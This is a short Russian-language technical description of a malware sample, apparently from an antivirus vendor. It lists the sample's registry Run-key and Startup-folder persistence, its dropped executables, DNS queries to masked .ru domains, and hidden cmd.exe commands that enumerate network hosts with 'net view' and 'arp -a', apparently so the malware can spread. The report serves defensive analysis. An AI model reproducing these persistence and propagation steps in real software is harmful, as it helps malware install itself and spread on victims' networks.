Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '' = ''
- [<HKLM>\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run] '' = ''
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\explorer.lnk
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\temporx\vid001.exe
- %APPDATA%\temporx\uihost32.exe
- %APPDATA%\temporx\uihost64.exe
- %TEMP%\nsx1792.tmp\inetc.dll
Сетевая активность
UDP
- DNS ASK kr#s.ru
- DNS ASK zc#p.ru
Другое
Создает и запускает на исполнение
- '%APPDATA%\temporx\vid001.exe'
- '%APPDATA%\temporx\vid001.exe' ' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& ...' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& ...
- '%WINDIR%\syswow64\cmd.exe' /c net view|find /i "\\" || arp -a|find /i " 1"
- '%WINDIR%\syswow64\net.exe' view
- '%WINDIR%\syswow64\find.exe' /i "\\"
